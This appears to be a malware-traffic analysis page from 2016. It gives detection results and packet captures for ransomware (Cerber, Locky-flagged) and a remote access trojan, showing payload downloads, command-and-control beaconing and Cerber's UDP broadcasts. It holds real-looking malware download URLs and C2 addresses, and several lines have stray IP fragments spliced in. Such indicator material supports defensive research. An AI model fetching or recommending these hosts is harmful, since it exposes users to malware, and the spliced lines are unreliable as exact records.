Ransomware Vector Variant Unknown Onenote.net PCAP file download traffic sample

SHA256: 87fad71988400eefc2139cc3a3616fa21f683290b73247bc2b9ba37bba54e636
File name: ubaupn
Detection ratio: 3 / 54
Analysis date: 2016-12-17 05:38:18 UTC ( 0 minutes ago )
Antivirus Result Update
CAT-QuickHeal TrojanPWS.ZBot 20161216
TrendMicro Ransom_LOCKYENC.AXFAR 20161217
TrendMicro-HouseCall Ransom_LOCKYENC.AXFAR 20161217

2016-12-16 23:54:44.875193 IP 192.168.1.102.59998 > 198.105.221.209.80: Flags [P.], seq 0:288, ack 1, win 64240, length 288: HTTP: GET /ubaupn HTTP/1.1
E..H=.@…VI…f.i…^.P….T}..P…l…GET /ubaupn HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: amaniinitiative.org
Connection: Keep-Alive

2016-12-16 23:54:46.999606 IP 192.168.1.102.59998 > 198.105.221.209.80: Flags [P.], seq 288:490, ack 161914, win 62927, length 202: HTTP: GET /favicon.ico HTTP/1.1
E…=R@…Vj…f.i…^.P….T.U.P….-..GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: amaniinitiative.org
Connection: Keep-Alive

2016-12-16 23:54:47.338390 IP 192.168.1.102.59998 > 198.105.221.209.80: Flags [.], ack 162444, win 64240, length 0
E..(=S@…W3…f.i…^.P….T.W.P….I……..
2016-12-16 23:54:52.275637 IP 192.168.1.102.59998 > 198.105.221.209.80: Flags [.], ack 162445, win 64240, length 0
E..(=T@…W2…f.i…^.P….T.W.P….H……..
2016-12-16 23:54:52.277577 IP 192.168.1.102.59998 > 198.105.221.209.80: Flags [F.], seq 490, ack 162445, win 64240, length 0
E..(=U@…W1…f.i…^.P….T.W.P….G……..
2016-12-16 23:56:39.349925 IP 192.168.1.102.56466 > 75.75.75.75.53: 35821+ A? cdn.onenote.net. (33)
E..=,……….fKKKK…5.)……………cdn.onenote.net…..

 

111.67.197.151.6666 RAT Remote Access Trojan Malware Trojan PCAP File Download Traffic Sample

SHA256:     028f3aff1bbb9bdc57fd0ed7bff829b12a6f47872655f85e49001624ddb57e94
File name:     NewRat.exe
Detection ratio:     50 / 56
Analysis date:     2016-12-17 01:49:07 UTC ( 0 minutes ago )

Antivirus     Result     Update
ALYac     Generic.ServStart2.B7BD945B     20161217
AVG     Atros.BOTV     20161216
AVware     BehavesLike.Win32.Malware.wsc (mx-v)     20161217
Ad-Aware     Generic.ServStart2.B7BD945B     20161217
AegisLab     Troj.W32.Gen.mner     20161216
AhnLab-V3     Trojan/Win32.Regrun.R153612     20161216
Antiy-AVL     Trojan[:HEUR]/Win32.AGeneric     20161217
Arcabit     Generic.ServStart2.B7BD945B     20161217
Avast     Win32:Malware-gen     20161217
Avira (no cloud)     TR/Dldr.Yemrok.aona     20161216
Baidu     Win32.Trojan.ServStart.aw     20161207
BitDefender     Generic.ServStart2.B7BD945B     20161217
Bkav     W32.Clodf83.Trojan.75df     20161216
Comodo     TrojWare.Win32.GameThief.Magania.~NWABI     20161216
CrowdStrike Falcon (ML)     malicious_confidence_100% (W)     20161024
Cyren     W32/NewMalware-Rootkit-I-based!     20161217

 

d

111.67.197.151.6666111.67.197.151.6666

2016-12-16 22:10:42.464406 IP 192.168.1.102.59577 > 123.1.157.146.80: Flags [P.], seq 0:285, ack 1, win 256, length 285: HTTP: GET /NewRat.exe HTTP/1.1
E..Eu^@……..f{……P{..R.:x.P….*..GET /NewRat.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: www.xyd2.vip
Connection: Keep-Alive

2016-12-16 22:10:42.771947 IP 192.168.1.102.59577 > 123.1.157.146.80: Flags [.], ack 2921, win 256, length 0
E..(u_@……..f{……P{..o.:.]P….O……..
2016-12-16 22:10:43.055447 IP 192.168.1.102.59577 > 123.1.157.146.80: Flags [.], ack 5841, win 256, length 0
E..(u`@……..f{……P{..o.:..P…
………

016-12-16 22:11:04.979590 IP 192.168.1.102.59578 > 111.67.197.151.6666: Flags [S], seq 3889994307, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.x@….b…foC…..
…C…… ..A…………..
2016-12-16 22:11:05.234889 IP 192.168.1.102.59578 > 111.67.197.151.6666: Flags [.], ack 3576552473, win 256, length 0
E..(.y@….m…foC…..
…D.-..P………….
2016-12-16 22:11:05.247183 IP 192.168.1.102.59578 > 111.67.197.151.6666: Flags [P.], seq 0:1164, ack 1, win 256, length 1164
E….z@……..foC…..
…D.-..P………..    …Win XP………………………………………………….Vip….2015…………………1..2499MHz………………….3389…………………………………………….
………………………………………………………………………………………………………………………………………………………………………………………….
………………………………………………………………………………………………………………………………………………………………………………………….
……………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………….

 

2016-12-16 22:13:12.678256 IP 192.168.1.102.59586 > 216.58.217.174.80: Flags [.], ack 7781, win 256, length 0
E..(WM@…/….f.:…..P.Y…j..P………….
2016-12-16 22:13:13.731458 IP 192.168.1.102.59586 > 216.58.217.174.80: Flags [P.], seq 2184:2623, ack 7781, win 256, length 439: HTTP: GET /edgedl/release2/93c2c6lma34er8r6lb3ntekrnresjh08hjdgmygbd5jazduckt1jkhlvqnelx75vp5jtdbid37u0iiynwwvvwbdz8yvemt5abv5/GoogleUpdateSetup.exe HTTP/1.1
E…WN@…-….f.:…..P.Y…j..P…~…GET /edgedl/release2/93c2c6lma34er8r6lb3ntekrnresjh08hjdgmygbd5jazduckt1jkhlvqnelx75vp5jtdbid37u0iiynwwvvwbdz8yvemt5abv5/GoogleUpdateSetup.exe HTTP/1.1
Accept: */*
Accept-Encoding: identity
Range: bytes=70904-113270
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
X-GoogleUpdate-Interactivity: bg
User-Agent: Microsoft BITS/6.7
Host: redirector.gvt1.com
Connection: Keep-Alive

2016-12-16 22:13:13.771889 IP 192.168.1.102.59586 > 216.58.217.174.80: Flags [.], ack 9337, win 256, length 0
E..(WO@…/….f.:…..P.Y…j.3P….J……..
2016-12-16 22:13:14.795676 IP 192.168.1.102.59586 > 216.58.217.174.80: Flags [P.], seq 2623:3063, ack 9337, win 256, length 440: HTTP: GET /edgedl/release2/93c2c6lma34er8r6lb3ntekrnresjh08hjdgmygbd5jazduckt1jkhlvqnelx75vp5jtdbid37u0iiynwwvvwbdz8yvemt5abv5/GoogleUpdateSetup.exe HTTP/1.1
E…WP@…-….f.:…..P.Y…j.3P…….GET /edgedl/release2/93c2c6lma34er8r6lb3ntekrnresjh08hjdgmygbd5jazduckt1jkhlvqnelx75vp5jtdbid37u0iiynwwvvwbdz8yvemt5abv5/GoogleUpdateSetup.exe HTTP/1.1
Accept: */*
Accept-Encoding: identity
Range: bytes=113271-202459
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
X-GoogleUpdate-Interactivity: bg
User-Agent: Microsoft BITS/6.7
Host: redirector.gvt1.com
Connection: Keep-Alive

nnapoakea.top read.php?f=0.dat CERBER Ransomware 35.166.4.* 37.15.20.* 77.1.12.* 91.239.24.* PCAP File Download Traffic Sample

http://nnapoakea.top/read.php?f=0.dat

SHA256:     5a1a12fb2668af622c7882003561c1abff5b99dc9db3d51a55cbfd4dd3d797e9
File name:     read.php?f=0.dat
Detection ratio:     7 / 55
Analysis date:     2016-12-17 01:16:52 UTC ( 1 minute ago )

Antivirus     Result     Update
AVware     Trojan.Win32.Generic!BT     20161217
AhnLab-V3     Trojan/Win32.Cerber.R192010     20161216
Bkav     HW32.Packed.F166     20161216
Invincea     virus.win32.sality.at     20161216
Qihoo-360     HEUR/QVM20.1.0000.Malware.Gen     20161217
Symantec     Heur.AdvML.B     20161217
VIPRE     Trojan.Win32.Generic!BT     20161217

SHA256:     5a1a12fb2668af622c7882003561c1abff5b99dc9db3d51a55cbfd4dd3d797e9
File name:     read.php?f=1.dat
Detection ratio:     7 / 55

Antivirus     Result     Update
Invincea     virus.win32.sality.at     20161216
AhnLab-V3     Trojan/Win32.Cerber.R192010     20161216
AVware     Trojan.Win32.Generic!BT     20161217
VIPRE     Trojan.Win32.Generic!BT     20161217
Bkav     HW32.Packed.F166     20161216
Qihoo-360     HEUR/QVM20.1.0000.Malware.Gen     20161217
Symantec     Heur.AdvML.B     20161217

2016-12-17 00:00:18.590572 IP 192.168.1.102.59801 > 75.75.75.75.53: 52283+ A? nnapoakea.top. (31)
E..;,……….fKKKK…5.’…;……….        nnapoakea.top…..
2016-12-17 00:00:29.499334 IP 192.168.1.102.60018 > 35.166.4.45.80: Flags [.], ack 288121, win 1003, length 0
E..(R.@……..f#..-.r.P(R.j….P………….
2016-12-17 00:00:52.712693 IP 192.168.1.102.60018 > 35.166.4.45.80: Flags [P.], seq 292:584, ack 288121, win 1003, length 292: HTTP: GET /read.php?f=0.dat HTTP/1.1
E..LR.@……..f#..-.r.P(R.j….P…….GET /read.php?f=0.dat HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us91.239.24
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: nnapoakea.top
Connection: Keep-Alive

2016-12-17 00:00:53.978994 IP 192.168.1.102.60018 > 35.166.4.45.80: Flags [.], ack 291041, win 1003, length 0
E..(R.@……..f#..-.r.P(R…..zP….M……..
2016-12-17 00:00:53.979790 IP 192.168.1.102.60018 > 35.166.4.45.80: Flags [.], ack 293961, win 1003, length 0
E..(S.@……..f#..-.r.P(R……P………….
2016-12-17 00:00:53.981207 IP 192.168.1.102.60018 > 35.166.4.45.80: Flags91.239.24 [.], ack 296881, win 1003, length 0
E..(S.@……..f#..-.r.P(R…..JP….}……..
2016-12-17 00:00:53.981988 IP 192.168.1.102.60018 > 35.166.4.45.80: Flags [.], ack 299801, win 1003, length 0
E..(S.@……..f#..-.r.P(R……P…t………
2016-12-17 00:00:53.982836 IP 192.168.1.102.60018 > 35.166.4.45.80: Flags [.], ack 302721, win 1003, length 0
E..(S.@……..f#..-.r.P(R……P…h………
2016-12-17 00:00:54.087105 IP 192.168.1.102.60018 > 35.166.4.45.80: Flags [.], ack 305641, win 1003, length 0
E..(S.@……..f#..-.r.P(R……P…]E……..
2016-12-17 00:00:54.087968 IP 192.168.1.102.60018 > 35.166.4.45.80: Flags [.], ack 308561, win 1003, length 0
E..(S.@……..f#..-.r.P(R……P…Q………
2016-12-17 00:00:54.107016 IP 192.168.1.102.60018 > 35.166.4.45.80: Flags [.], ack 323161, win 1003, length 0
E..(S.@……..f#..-.r.P(R……P………….
2016-12-17 00:00:54.130419 IP 192.168.1.102.60018 > 35.166.4.45.80: Flags [.], ack 331921, win 1003, length 0
E..(S.@……..f#..-.r.P(R….?*P………….
2016-12-17 00:00:54.203658 IP 192.168.1.102.60018 > 35.166.4.45.80: Flags [.], ack 334841, win 1003, length 0
E..(S.@……..f#..-.r.P(R….J.P….4……..
2016-12-17 00:00:54.205053 IP 192.168.1.102.60018 > 35.166.4.45.80: Flags91.239.24 [.], ack 337761, win 1003, length 0
E..(S   @……..f#..-.r.P(R….U.P………….
2016-12-17 00:00:54.205672 IP 192.168.1.102.60018 > 35.166.4.45.80: Flags [.], ack 340681, win 1003, length 02016-12-17 00:01:33.936525 IP 192.168.1.102.50260 > 37.15.20.0.6892: UDP, length 25
E..5U{………f%….T…!.~ac71ae205179044695010009a
2016-12-17 00:01:33.936581 IP 192.168.1.102.50260 > 37.15.20.1.6892: UDP, length 25
E..5l……….f%….T…!.}ac71ae205179044695010009a
2016-12-17 00:01:33.936632 IP 192.168.1.102.50260 > 37.15.20.2.6892: UDP, length 25
E..5    …..7….f%….T…!.|ac71ae205179044695010009a
2016-12-17 00:01:33.936688 IP 192.168.1.102.50260 > 37.15.20.3.6892: UDP, length 25
E..50C…..U…f%….T…!.{ac71ae205179044695010009a
2016-12-17 00:01:33.936743 IP 192.168.1.102.50260 > 37.15.20.4.6892: UDP, length 25
E..5{……….f%….T…!.zac71ae205179044695010009a
2016-12-17 00:01:33.936750 IP 192.168.1.102.50260 > 37.15.20.5.6892: UDP, lengt77.1.12.23h 25
E..5B……….f%….T…!.yac71ae205179044695010009a
2016-12-17 00:01:33.936799 IP 192.168.1.102.50260 > 37.15.20.6.6892: UDP, length 25
E..5’……….f%….T…!.xac71ae205179044695010009a
2016-12-17 00:01:33.936890 IP 192.168.1.102.50260 > 37.15.20.7.6892: UDP, length 25
E..5.;….”Y…f%….T…!.wac71ae205179044695010009a
2016-12-17 00:01:33.936943 IP 192.168.1.102.50260 > 37.15.20.8.6892: UDP, length 25
E..5.I….>J…f%….T…!.vac71ae205179044695010009a37.15.20
2016-12-17 00:01:33.936951 IP 192.168.1.102.50260 > 37.15.20.9.6892: UDP, length 25
E..5;……….f%..     .T…!.uac71ae205179044695010009a
2016-12-17 00:01:33.937054 IP 192.168.1.102.50260 > 37.15.20.10.6892: UDP, length 25
E..5^……….f%..
.T…!.tac71ae205179044695010009a
2016-12-17 00:01:33.937063 IP 192.168.1.102.50260 > 37.15.20.11.6892: UDP, length 25
E..5g……
…f%….T…!.sac71ae205179044695010009a
2016-12-17 00:01:33.937113 IP 192.168.1.102.50260 > 37.15.20.12.6892: UDP, length 25
E..5,A…..N…f%….T…!.rac71ae205179044695010009a
2016-12-17 00:01:33.937195 IP 192.168.1.102.50260 > 37.15.20.13.6892: UDP, length 25
E..5……*….f%….T…!.qac71ae205179044695010009a
2016-12-17 00:01:33.937250 IP 192.168.1.102.50260 > 37.15.20.14.6892: UDP, length 25
E..5p……….f%….T…!.pac71ae205179044695010009a
2016-12-17 00:01:33.937257 IP 192.168.1.102.50260 > 37.15.20.15.6892: UDP, length 25
E..5I……n…f%….T…!.oac71ae205179044695010009a
2016-12-17 00:01:33.937305 IP 192.168.1.102.50260 > 37.15.20.16.6892: UDP, length 25
E..5>……….f%….T…!.nac71ae205179044695010009a
2016-12-17 00:01:33.938748 IP 192.168.1.102.50260 > 77.1.12.13.6892: UDP, length 25
E..5/d…..7…fM….T…!..ac71ae205179044695010009a
2016-12-17 00:01:33.938797 IP 192.168.1.102.50260 > 77.1.12.14.6892: UDP, length 25
E..5Jz….. …fM….T…!.~ac71ae205179044695010009a
2016-12-17 00:01:33.938886 IP 192.168.1.102.50260 > 77.1.12.15.6892: UDP, length 25
E..5s……….fM….T…!.}ac71ae205179044695010009a
2016-12-17 00:01:33.938894 IP 192.168.1.102.50260 > 77.1.12.16.6892: UDP, length 25
E..5.f…..3…fM….T…!.|ac71ae205179044695010009a
2016-12-17 00:01:33.938992 IP 192.168.1.102.50260 > 77.1.12.17.6892: UDP, length 25
E..5=……….fM….T…!.{ac71ae205179044695010009a91.239.24
2016-12-17 00:01:33.939050 IP 192.168.1.102.50260 > 77.1.12.18.6892: UDP, length 25
E..5X……….fM….T…!.zac71ae205179044695010009a
2016-12-17 00:01:33.939058 IP 192.168.1.102.50260 > 77.1.12.19.6892: UDP, length 25
E..5a……….fM….T…!.yac71ae205179044695010009a
2016-12-17 00:01:33.939107 IP 192.168.1.102.50260 > 77.1.12.20.6892: UDP, length 25
E..5*6…..^…fM….T…!.xac71ae205179044695010009a
2016-12-17 00:01:33.939194 IP 192.168.1.102.50260 > 77.1.12.21.6892: UDP, length 25
E..5………..fM….T…!.wac71ae205179044695010009a
2016-12-17 00:01:33.939203 IP 192.168.1.102.50260 > 77.1.12.22.6892: UDP, length 25
E..5v……….fM….T…!.vac71ae205179044695010009a
2016-12-17 00:01:33.939253 IP 192.168.1.102.50260 > 77.1.12.23.6892: UDP, length 25
E..5O0…..a…fM….T…!.uac71ae205179044695010009a
2016-12-17 00:01:33.939336 IP 192.168.1.102.50260 > 77.1.12.24.6892: UDP, length 25
E..5S……….fM….T…!.tac71ae205179044695010009a
2016-12-17 00:01:33.939345 IP 192.168.1.102.50260 > 77.1.12.25.6892: UDP, length 25
E..5j……….fM….T…!.sac71ae205179044695010009a
2016-12-17 00:01:33.939441 IP 192.168.1.102.50260 > 77.1.12.26.6892: UDP, length 25
E..5………..fM….T…!.rac71ae205179044695010009a
2016-12-17 00:01:33.939449 IP 192.168.1.102.50260 > 77.1.12.27.6892: UDP, length 25
E..56r………fM….T…!.qac71ae205179044695010009a
2016-12-17 00:01:33.939540 IP 192.168.1.102.50260 > 77.1.12.28.6892: UDP, length 25
E..5}4…..X…fM….T…!.pac71ae205179044695010009a
2016-12-17 00:01:33.939549 IP 192.168.1.102.50260 > 77.1.12.29.6892: UDP, length 25
E..5D……….fM….T…!.oac71ae205179044695010009a
2016-12-17 00:01:33.939598 IP 192.168.1.102.50260 > 77.1.12.30.6892: UDP, length 25
E..5″……{…fM….T…!.nac71ae205179044695010009a
2016-12-17 00:01:33.939683 IP 192.168.1.102.50260 > 77.1.12.31.6892: UDP, length 25
E..5.B…..H…fM….T…!.mac71ae205179044695010009a
2016-12-17 00:01:33.939738 IP 192.168.1.102.50260 > 91.239.24.0.6892: UDP, length 25
E..5………..f[….T…!..ac71ae205179044695010009a
2016-12-17 00:01:33.939746 IP 192.168.1.102.50260 > 91.239.24.1.6892: UDP, length 25
E..5;-………f[….T…!..ac71ae205179044695010009a
2016-12-17 00:01:33.939798 IP 192.168.1.102.50260 > 91.239.24.2.6892: UDP, length 25
E..5^……….f[….T…!..ac71ae205179044695010009a
2016-12-17 00:01:33.939878 IP 192.168.1.102.50260 > 91.239.24.3.6892: UDP, length 25
E..5g……….f[….T…!..ac71ae205179044695010009a
2016-12-17 00:01:33.939887 IP 192.168.1.102.50260 > 91.239.24.4.6892: UDP, length 25
E..5,……(…f[….T…!..ac71ae205179044695010009a
2016-12-17 00:01:33.939936 IP 192.168.1.102.50260 > 91.239.24.5.6892: UDP, length 25

aa.exe Leads to unknown Chinese Malware Infection FULL PCAP file download 111.67.197.151 port 6666

SHA256:     b89384e4dcec9c280b145b0f4aa7d05e783449ada227fb51ccbd2f25adfb57ca
File name:     aa.exe
Detection ratio:     24 / 55
Analysis date:     2016-12-17 01:32:37 UTC ( 0 minutes ago )

Antivirus     Result     Update
AVG     Win32/DH{I4F6gmU?}     20161216
AVware     Trojan.Win32.Generic!BT     20161217
Ad-Aware     Application.Tool.SIY     20161217
AegisLab     Heur.Advml.Gen!c     20161216
Arcabit     Application.Tool.SIY     20161217
Avast     Win32:Malware-gen     20161217
BitDefender     Application.Tool.SIY     20161216
ClamAV     Win.Trojan.Agent-1890258     20161216
DrWeb     Trojan.Siggen7.8058     20161217
ESET-NOD32     Win32/Spy.Agent.PAR     20161217
F-Secure     Application.Tool.SIY     20161217
GData     Application.Tool.SIY     20161217
Jiangmin     Trojan.Agent.aqqh     20161216
K7GW     Riskware ( 0040eff71 )     20161217
Kaspersky     Trojan.Win32.Agent.ijwp     20161216

 

 

2016-12-16 22:40:55.281087 IP 192.168.1.102.59699 > 104.214.150.216.80: Flags [P.], seq 0:284, ack 1, win 258, length 284: HTTP: GET /aa.exe HTTP/1.1
E..D,A@……..fh….3.P<.~h3t”0P…I”..GET /aa.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: 104.214.150.216
Connection: Keep-Alive

 

2016-12-16 22:41:07.611900 IP 192.168.1.102.59578 > 111.67.197.151.6666: Flags [.], ack 3576552473, win 256, options [nop,nop,sack 1 {0:1}], length 0
E..4..@….V…foC…..
…..-………….
.-…-..

2016-12-16 22:43:58.018666 IP 192.168.1.102.59706 > 54.230.18.110.443: Flags [P.], seq 0:186, ack 1, win 256, length 186
E…..@……..f6..n.:..R.p….nP………………l.].c..3)…..!…..Y.@~.Y..f/.,….0.(…/.’…..k.9…g.3…..n………client-cf.dropbox.com………
………………………     .
.#….. …………………………..
2016-12-16 22:43:58.045426 IP 192.168.1.102.59706 > 54.230.18.110.443: Flags [.], ack 2921, win 256, length 0
E..(..@……..f6..n.:..R.q…..P………….
2016-12-16 22:43:58.049634 IP 192.168.1.102.59706 > 54.230.18.110.443: Flags [P.], seq 186:312, ack 3006, win 256, length 126
E…..@….6…f6..n.:..R.q….+P…0…….F…BA….K^.j.@.![….c..rh…..(…-….-….J. ).3..(…..>….  3………….(.b.%……r…1….U..B.?.OI…(t.Rx=?.o
2016-12-16 22:43:58.071702 IP 192.168.1.102.59706 > 54.230.18.110.443: Flags [P.], seq 312:793, ack 3248, win 255, length 481
E..     ..@……..f6..n.:..R.r…..P…@………b.%….8..zb.k8……3.].n}s../”..(..
.o.97………”..CB.NC..Q.3_….;.f.h..T”w….2S…O..N.AC.@.{..@z[..mT.Z^0.B.=.G…..[X.j.\..c..*[N…Qe.B…j..;.!.
.-.f.q8.`.
..S…f….lk(.5..6………gm\n..)0…vV.XAz.n.(……’…._.>…R.0…u…\…..O..!..        ….C…..(.f.0..+.j…3z..Ip<.D`.@…  z………i.c.:j…,>…..E.>.
..]pq…).z.>~8….@..-.(…j..E.T’.9Fc..X….&+.l..Tm……el……1mYq..%+S.6…….]Bn…<_d…       T…..?…c…..lF.3}…@…g4x4..>….z^..Q{V;..
2016-12-16 22:43:58.399542 IP 192.168.1.102.59706 > 54.230.18.110.443: Flags [.], ack 6168, win 256, length 0
E..(..@……..f6..n.:..R.s…..P………….
2016-12-16 22:43:58.400811 IP 192.168.1.102.59706 > 54.230.18.110.443: Flags [.], ack 9088, win 256, length 0
E..(..@……..f6..n.:..R.s…..P………….
2016-12-16 22:43:58.401577 IP 192.168.1.102.59706 > 54.230.18.110.443: Flags [.], ack 11795, win 256, length 0
E..(..@……..f6..n.:..R.s…..P………….
2016-12-16 22:43:58.453402 IP 192.168.1.102.59706 > 54.230.18.110.443: Flags [.], ack 11829, win 256, length 0
E..(..@……..f6..n.:..R.s…..P………….
2016-12-16 22:44:07.893502 IP 192.168.1.102.59578 > 111.67.197.151.6666: Flags [.], ack 1, win 256, options [nop,nop,sack 1 {0:1}], length 0
E..4..@….U…foC…..
…..-………….
.-…-..
2016-12-16 22:45:58.402490 IP 192.168.1.102.59706 > 54.230.18.110.443: Flags [.], ack 11861, win 256, length 0
E..(..@……..f6..n.:..R.s…..P………….
2016-12-16 22:47:08.061204 IP 192.168.1.102.59578 > 111.67.197.151.6666: Flags [.], ack 1, win 256, options [nop,nop,sack 1 {0:1}], length 0
E..4..@….T…foC…..
…..-………….
.-…-..

 

Malspam E-mail Leads to Ransomware Cerber/Zerber Infection 4fv3b5.exe Vector FULL PCAP FILE DOWNLOAD Traffic Sample

SHA256: 2f2b2e30abe71f9a93d6ad7418facf0fcc1323fa0017682f254becf99848e43c
File name: 4fv3b5.exe
Detection ratio: 39 / 56
Analysis date: 2016-12-16 08:39:47 UTC ( 0 minutes ago )
Avira (no cloud) TR/Dropper.btuyq 20161216
BitDefender Trojan.GenericKD.3903694 20161216
Bkav W32.DominasaAST.Trojan 20161215
CAT-QuickHeal TrojanRansom.Zerber 20161216
CrowdStrike Falcon (ML) malicious_confidence_100% (W) 20161024
DrWeb Trojan.Encoder.7233 20161216
ESET-NOD32 Win32/Filecoder.Cerber.C 20161216
Emsisoft Trojan.GenericKD.3903694 (B) 20161216
F-Secure Trojan.GenericKD.3903694 20161216
Fortinet W32/Malicious_Behavior.VEX 20161216
GData Trojan.GenericKD.3903694 20161216
K7AntiVirus Trojan ( 004ff8881 ) 20161216
K7GW Trojan ( 004ff8881 ) 20161216
Kaspersky Trojan-Ransom.Win32.Zerber.apnm 20161216
Malwarebytes Ransom.Locky 20161216
McAfee Generic.atf 20161216
McAfee-GW-Edition BehavesLike.Win32.Ransom.dc 20161216
eScan Trojan.GenericKD.3903694 20161216
Microsoft Ransom:Win32/Genasom!rfn 20161216

btc.blockr.io displays a page on how to pay to get your data back and cerber has a speech program which explains your data has been encrypted and you must follow the instructions to get your information back:

Example of files that were encrypted and protected:

The domain name ftoxmpdipwobp4qy.joa688.top was NX and not required for the purchase process.

2016-12-16 01:29:05.256362 IP 192.168.1.102.50104 > 72.167.232.152.80: Flags [P.], seq 0:303, ack 1, win 256, length 303: HTTP: GET //up1/1/4fv3b5.exe HTTP/1.1
E..W..@……..fH……P.n……P…….GET //up1/1/4fv3b5.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: www.monitorspeakers.net
Connection: Keep-Alive

 

2016-12-16 01:29:06.602141 IP 192.168.1.102.50077 > 216.58.218.234.443: Flags [.], seq 1936354787:1936354788, ack 530483529, win 254, length 1
E..)w.@……..f.:……sjm….IP………….
2016-12-16 01:29:09.071199 IP 192.168.1.102.50104 > 72.167.232.152.80: Flags [.], ack 255316, win 735, length 0
E..(..@……..fH……P.n.2….P….?……..
2016-12-16 01:29:16.674408 IP 192.168.1.102.59297 > 15.49.2.0.6892: UDP, length 10
E..&$…..C….f.1……….hi00889070……..
2016-12-16 01:29:16.675018 IP 192.168.1.102.59297 > 15.49.2.1.6892: UDP, length 10
E..&.D….KC…f.1……….hi00889070……..
2016-12-16 01:29:16.675047 IP 192.168.1.102.59297 > 15.49.2.2.6892: UDP, length 10
E..&xz………f.1……….hi00889070……..
2016-12-16 01:29:16.675052 IP 192.168.1.102.59297 > 15.49.2.3.6892: UDP, length 10
E..&A…..&….f.1……….hi00889070……..
2016-12-16 01:29:16.675175 IP 192.168.1.102.59297 > 15.49.2.4.6892: UDP, length 10
E..&
…..]….f.1……….hi00889070……..
2016-12-16 01:29:16.675185 IP 192.168.1.102.59297 > 15.49.2.5.6892: UDP, length 10
E..&3<….5G…f.1……….hi00889070……..
2016-12-16 01:29:16.675235 IP 192.168.1.102.59297 > 15.49.2.6.6892: UDP, length 10
E..&V……p…f.1……….hi00889070……..
2016-12-16 01:29:16.675256 IP 192.168.1.102.59297 > 15.49.2.7.6892: UDP, length 10
E..&o……….f.1……….hi00889070……..
2016-12-16 01:29:16.675334 IP 192.168.1.102.59297 > 15.49.2.8.6892: UDP, length 10
E..&s……….f.1……….hi00889070……..
2016-12-16 01:29:16.675343 IP 192.168.1.102.59297 > 15.49.2.9.6892: UDP, length 10
E..&J……….f.1.     ……..hi00889070……..
2016-12-16 01:29:16.675437 IP 192.168.1.102.59297 > 15.49.2.10.6892: UDP, length 10
E..&/L….92…f.1.
……..hi00889070……..
2016-12-16 01:29:16.675444 IP 192.168.1.102.59297 > 15.49.2.11.6892: UDP, length 10
E..&……Q….f.1……….hi00889070……..
2016-12-16 01:29:16.675595 IP 192.168.1.102.59297 > 15.49.2.12.6892: UDP, length 10
E..&]…..
….f.1……….hi00889070……..
2016-12-16 01:29:16.675610 IP 192.168.1.102.59297 > 15.49.2.13.6892: UDP, length 10
E..&d……a…f.1……….hi00889070……..
2016-12-16 01:29:16.675616 IP 192.168.1.102.59297 > 15.49.2.14.6892: UDP, length 10
E..&.D….g6…f.1……….hi00889070……..
2016-12-16 01:29:16.675651 IP 192.168.1.102.59297 > 15.49.2.15.6892: UDP, length 10
E..&8…../….f.1……….hi00889070……..

2016-12-16 01:29:16.676470 IP 192.168.1.102.59297 > 122.1.13.0.6892: UDP, length 10
E..&:N…..i…fz………r.hi00889070……..
2016-12-16 01:29:16.676519 IP 192.168.1.102.59297 > 122.1.13.1.6892: UDP, length 10
E..&………..fz………r.hi00889070……..
2016-12-16 01:29:16.676602 IP 192.168.1.102.59297 > 122.1.13.2.6892: UDP, length 10
E..&f……….fz………r.hi00889070……..
2016-12-16 01:29:16.676655 IP 192.168.1.102.59297 > 122.1.13.3.6892: UDP, length 10
E..&_x…..<…fz………r.hi00889070……..
2016-12-16 01:29:16.676708 IP 192.168.1.102.59297 > 122.1.13.4.6892: UDP, length 10
E..&.>…..u…fz………r.hi00889070……..
2016-12-16 01:29:16.676714 IP 192.168.1.102.59297 > 122.1.13.5.6892: UDP, length 10
E..&-……….fz………r.hi00889070……..
2016-12-16 01:29:16.676763 IP 192.168.1.102.59297 > 122.1.13.6.6892: UDP, length 10
E..&H……….fz………r.hi00889070……..
2016-12-16 01:29:16.676849 IP 192.168.1.102.59297 > 122.1.13.7.6892: UDP, length 10
E..&q……….fz………r.hi00889070……..
2016-12-16 01:29:16.676901 IP 192.168.1.102.59297 > 122.1.13.8.6892: UDP, length 10
E..&m|…..3…fz………r.hi00889070……..
2016-12-16 01:29:16.676907 IP 192.168.1.102.59297 > 122.1.13.9.6892: UDP, length 10
E..&T……….fz..     ……r.hi00889070……..
2016-12-16 01:29:16.676956 IP 192.168.1.102.59297 > 122.1.13.10.6892: UDP, length 10
E..&1……….fz.
……r.hi00889070……..
2016-12-16 01:29:16.677043 IP 192.168.1.102.59297 > 122.1.13.11.6892: UDP, length 10
E..&.Z…..R…fz………r.hi00889070……..
2016-12-16 01:29:16.677097 IP 192.168.1.102.59297 > 122.1.13.12.6892: UDP, length 10
